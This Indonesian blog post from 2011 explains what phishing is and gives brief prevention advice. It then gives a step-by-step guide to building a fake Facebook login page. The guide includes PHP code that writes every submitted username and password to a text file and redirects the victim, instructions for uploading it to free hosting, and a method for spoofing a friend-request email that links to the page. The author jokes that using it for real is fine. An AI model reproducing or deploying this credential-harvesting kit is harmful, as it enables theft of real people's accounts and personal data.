Kamis, 01 Desember 2011

Cara Melakukan Phising UserID dan Password




Cara Melakukan Phising (penyadapan)



I.
Phising , Ada yang tau tentang Phising ? Yang pasti phising itu adalah 
cara mencoba untuk mendapatkan informasi seperti username, password, dan rincian kartu kredit dengan menyamar sebagai entitas terpercaya dalam sebuah komunikasi elektronik. Komunikasi yang mengaku berasal dari populer situs web sosial, situs lelang, prosesor pembayaran online atau IT administrator biasanya digunakan untuk memikat publik tidak curiga. Phishing biasanya dilakukan melalui e-mail spoofing atau pesan instan, dan sering mengarahkan pengguna untuk memasukkan rincian palsu di website yang tampilan dan nuansa yang hampir sama dengan satu sah. Phishing adalah contoh dari teknik rekayasa sosial yang digunakan untuk menipu pengguna,dan memanfaatkan kegunaan miskin teknologi keamanan web saat ini  Usaha untuk berurusan dengan meningkatnya jumlah insiden phishing yang dilaporkan termasuk legislasi, pelatihan pengguna, kesadaran publik,. dan langkah-langkah keamanan teknis.

Sebuah teknik phishing telah dijelaskan secara rinci pada tahun 1987, dan penggunaan rekaman pertama dari "phishing" istilah dibuat pada tahun 1996. Istilah ini adalah varian dari memancing, mungkin dipengaruhi oleh phreaking, dan menyinggung "umpan" yang digunakan dalam harapan bahwa calon korban akan "menggigit" dengan mengklik link berbahaya atau membuka attachment berbahaya, dalam hal informasi keuangan dan password kemudian dapat dicuri.


Waaaah enak banget ya kalo kita bisa melakukannya,, Tapi tindakan ini merupakan tindakan yang melanggar hukum sobat blogger.... So Cuma sekedar tau aja ya,, kalo di praktekin ??? Hmmm boleh juga sich.. hehehe..
Disini  saya cuma mau skedar Share aja sama kawan kawan blogger, Bagaimana cara kita melakukan penyadapan / Phising
 

Sebagai contoh kecil nya : 
melakukan penipuan kartu kredit atau memandu nasabah untuk melakukan transfer ke rekening tertentu dengan iming-iming hadiah, So hati hati ya sobat blogger jika ada yang mengiming imingi kita dengan hadiah / price / apalah segala jenisnya..

II.
Bagaimana phishing dilakukan?
Teknik yang sering digunakan oleh para penyadap adalah:

* Penggunaan alamat e-mail palsu dan grafik untuk menyesatkan user sehingga user terpancing menerima keabsahan e-mail atau web sites. Agar tampak meyakinkan, pelaku juga seringkali memanfaatkan logo atau merk dagang milik lembaga resmi, seperti; facebook, yahoo, bank atau penerbit lainnya. Pemalsuan ini dilakukan untuk memancing korban menyerahkan data pribadi, seperti; password, PIN dan nomor kartu kredit

* Membuat situs palsu / MANIPULASI LINK yang sama persis dengan situs resmi atau pelaku phishing mengirimkan e-mail yang berisikan link ke situs palsu tersebut.

* Membuat hyperlink ke web-site palsu atau menyediakan form isian yang ditempelkan pada e-mail yang dikirim.



Hmmm banyak juga kan cara nya,, ( Pengalaman Pribadiku dulu ) :D


 
III.
Mencegah agar tidak menjadi korban phishing
Jangan mudah terpancing untuk mengikuti arahan/petunjuk apapun sehubungan informasi data, rekening atau informasi penting lainnya, yang dianjurkan pada e-mail yang dilink ke situs tertentu. Jika Anda menerima e-mail sejenis ini dan mengatasnamakan Lembaga tertentu yang mencurigakan atau ASPAL, berhati-hatilah.


=============================

Cara Membuat Perangkap Penyadapan [Phising]

=============================

1. buka http://www.facebook.com/login.php,
lalu view source. copy dan paste ke notepad.
Cari "action=" (tanpa quote) dan kita akan memulai editingnya.
pada action="https://login.facebook.com/login.php" ubahlah menjadi action="next.php"
kemudian ubah juga methode dari "POST" menjadi "get"

simpan notepad ini menjadi index.php (jangan html)

2. buka notepad baru isikan kode berikut :


Code: Select all
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pass.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>



--> Simpan sebagai next.php


3. Buka notepad lagi biarkan kosong, lalu simpan dng nama pass.txt.
Upload 3 file tersebut "index.php, next.php, pass.txt" kedalam hosting misalnya 110mb.com, 000webhost.com atau 007sites.com.

OK, Kamu sudah punya phising page facebook sekarang.

4. Langkah-langkah spoofing.
copy content asli undangan pertemanan dari facebook.
edit hyperlink dari : "http:/www.facebook.com/n/?reqs.php"
ganti dengan halaman phising anda, hal ini tidak akan merubah tampilan di content asli facebook tapi tetap mengarah ke halaman phising kamu. Phising siap dikirim ke korban kamu.




Buat Sobat Bloger yang ingin tukar link Bisa Kunjungi Link ini

Tidak ada komentar:

Posting Komentar

Diharapkan dapat memberikan komentar yang membangun

Catatan: Hanya anggota dari blog ini yang dapat mengirim komentar.